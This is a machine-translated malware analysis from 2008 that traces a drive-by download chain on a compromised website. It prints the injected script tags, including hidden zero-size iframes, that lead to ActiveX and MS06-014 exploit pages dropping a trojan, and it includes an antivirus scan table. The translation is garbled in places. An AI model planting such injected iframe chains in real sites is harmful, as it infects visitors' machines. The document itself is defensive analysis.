Logo.jpg/logo.exe

Last Update:2018-12-05 Source: Internet

Author: User

Developer on Alibaba Coud: Build your first app with APIs, SDKs, and tutorials on the Alibaba Cloud. Read more ＞

Logo.jpg/logo.exe

EndurerOriginal
2008-04-30 th1Version

The website page contains code:
/---
<SCRIPT src = "hxxp: // www. Ol *** D * rain.com/ads/iw_t.js"> </scept>
---/

#1 hxxp: // www. Ol *** D * rain.com/ads/iw_t.js contains the Code:
/---
<SCRIPT src = '/images/jin.gif'> </SCRIPT>
---/

#1.1 hxxp: // www. Ol *** D * rain.com/images/jin.gifincludes the javascriptcode. Its function is to check cookie mymy_ad, and output code:
/---
<Script language = "JavaScript" src = "hxxp: // WW **. Shi ** T * ip.com/file/my.js"> </SCRIPT>
---/

#1.1.1 hxxp: // WW **. Shi ** T * ip.com/file/my.js:
/---
<Script language = 'javascript 'src = 'hxxp: // ad. Shi ** T * ip.com/file/ad.js'> </SCRIPT>
---/

#1.1.1.1 hxxp: // ad. Shi ** T * ip.com/file/ad.js output code:
/---
<IFRAME width = '0' Height = '0' src = 'hxxp: // WW **. Shi ** T * ip.com/file/logo.htm'> </iframe>
<IFRAME width = '25' Height = '0' src = 'hxxp: // WW **. Shi ** T * ip.com/file/xunlei.htm'> </iframe>
<IFRAME width = '0' Height = '0' src = 'hxxp: // WW **. Shi ** T * ip.com/file/real.htm'> </iframe>
<IFRAME width = '0' Height = '0' src = 'hxxp: // WW **. Shi ** T * ip.com/file/lz.htm'> </iframe>
<IFRAME width = '0' Height = '0' src = 'hxxp: // WW **. Shi ** T * ip.com/file/bf.htm'> </iframe>
<IFRAME width = '0' Height = '0' src = 'hxxp: // WW **. Shi ** T * ip.com/file/pps.htm'> </iframe>
<IFRAME width = '0' Height = '0' src = 'hxxp: // WW **. Shi ** T * ip.com/file/sdr.htm'> </iframe>
<IFRAME name = 'mycountif 'width = '0' Height = '0'> </iframe>
---/

#1.1.1.1.1 hxxp: // WW **. Shi ** T * ip.com/file/logo.htm

Download hxxp: // WW **. Shi ** T * ip.com/file/images/logo.jpg with MS06-014 Vulnerability

File Description: D:/test/logo.jpg
Attribute: ---
An error occurred while obtaining the file version information!
Creation Time: 12:31:44
Modification time: 12:31:44
Size: 30788 bytes, 30.68 KB
MD5: 497cd95b261c35e367c33010958cc7ac
Sha1: 1b4a5cd93d8c4fda-deaa8ba55f6a50de0ba4fae
CRC32: 3e7aaf5e

File 497cd95b261c35e0000c33010958cc7ac-received at 2008.04.30 07:38:54 (CET)

Anti-Virus engine	Version	Last update	Scan results
AhnLab-V3	2008.4.30.0	2008.04.29	-
AntiVir	7.8.0.10	2008.04.29	TR/dropper. gen
Authentium	4.93.8	2008.04.27	-
Avast	4.8.1169.0	2008.04.29	-
AVG	7.5.0.516	2008.04.30	Clicker. NBD
BitDefender	7.2	2008.04.30	-
Cat-quickheal	9.50	2008.04.29	(Suspicious)-dnascan
ClamAV	0.92.1	2008.04.30	Pua. Packed. UPack-2
Drweb	4.44.0.09170	2008.04.29	-
Esafe	7.0.15.0	2008.04.28	-
ETrust-vet	31.3.5746	2008.04.30	-
Ewido	4.0	2008.04.29	-
F-Prot	4.4.2.54	2008.04.30	-
F-Secure	6.70.13260.0	2008.04.30	-
Fortinet	3.14.0.0	2008.04.29	-
Ikarus	T3.1.1.26	2008.04.30	Trojan-dropper
Kaspersky	7.0.0.125	2008.04.30	-
McAfee	5284	2008.04.29	New malware. AJ
Microsoft	None	2008.04.22	-
Nod32v2	3064	2008.04.29	Win32/trojanclicker. Agent. NCS
Norman	5.80.02	2008.04.29	-
Panda	9.0.0.4	2008.04.30	Suspicious File
Prevx1	V2	2008.04.30	-
Sophos	4.28.0	2008.04.30	Mal/packer
Sunbelt	3.0.1056.0	2008.04.17	Vipre. Suspicious
Symantec	10	2008.04.30	-
Thehacker	6.2.92.297	2008.04.29	W32/Behav-Heuristic-060
Vba32	3.12.6.5	2008.04.29	-
Virusbuster	4.3.26: 9	2008.04.29	Packed/upack
Webcycler-Gateway	6.6.2	2008.04.30	Trojan. dropper. gen

Additional information
File Size: 30499 bytes
Md5...: f72b708b004a1ccfde0b3e10bced6cda
Sha1..: 439bac0bf2b84d09be5abce588b65bbb3cac55e9
Sha256: 60c6c4caa211c6fec6b011ba7d1574ce139854cb0fee5ca3591f31_f06e09c1
Sha512: Pushed <br> pushed
Peid ..:-
Peinfo :-
Packers: upack
Packers: pe_patch, upack

#1.1.1.1.2 hxxp: // WW **. Shi ** T * ip.com/file/xunlei.htm

Download hxxp: // WW **. Shi ** T * ip.com/file/images/logo.jpg using the thunder (pplayer. xpplayer.1, CLSID: F3E70CEA-956E-49CC-B444-73AFE593AD7F) Vulnerability

#1.1.1.1.3 hxxp: // WW **. Shi ** T * ip.com/file/real.htm

Download hxxp: // WW **. Shi ** T * ip.com/file/images/logo.jpg using the RealPlayer (ierpctl. ierpctl.1) Vulnerability

#1.1.1.1.4 hxxp: // WW **. Shi ** T * ip.com/file/lz.htm

Download hxxp: // WW **. Shi ** T * ip.com/file/images/logo.jpg with the vulnerability of lianzhong (glchat. glchatctrl.1, CLSID: AE93C5DF-A990-11D1-AEBD-5254ABDD2B69)

#1.1.1.1.5 hxxp: // WW **. Shi ** T * ip.com/file/bf.htm

Download hxxp: // WW **. Shi ** T * ip.com/file/images/logo.jpg using storm sound (MPs. stormplayer, CLSID: 6be52e1d-e586-474f-a6e2-1a85a9b4d9fb ).

#1.1.1.1.6 hxxp: // WW **. Shi ** T * ip.com/file/pps.htm

Download hxxp: // WW **. Shi ** T * ip.com/file/images/logo.jpg using the PPStream (powerplayer. powerplayerctrl.1, CLSID: 5ec7c511-cd0f-42e6-830c-1bd9882f3458) Vulnerability

Hxxp: // WW **. Shi ** T * ip.com/file/sdr.htm

Download hxxp: // WW **. Shi ** T * ip.com/file/images/logo.jpg by using the superstar generator (CLSID: 7f5e27ce-4a5c-11d3-9232-rjb48a05b2 ).

This article is an English version of an article which is originally in the Chinese language on aliyun.com and is provided for information purposes only. This website makes no representation or warranty of any kind, either expressed or implied, as to the accuracy, completeness ownership or reliability of the article or any translations thereof. If you have any concerns or complaints relating to the article, please send an email, providing a detailed description of the concern or complaint, to info-contact@alibabacloud.com. A staff member will contact you within 5 working days. Once verified, infringing content will be removed immediately.

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

Get Started for Free

Sales Support

1 on 1 presale consultation

Chat Contact Sales
After-Sales Support

24/7 Technical Support 6 Free Tickets per Quarter Faster Response

Open a Ticket
Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.

Learn More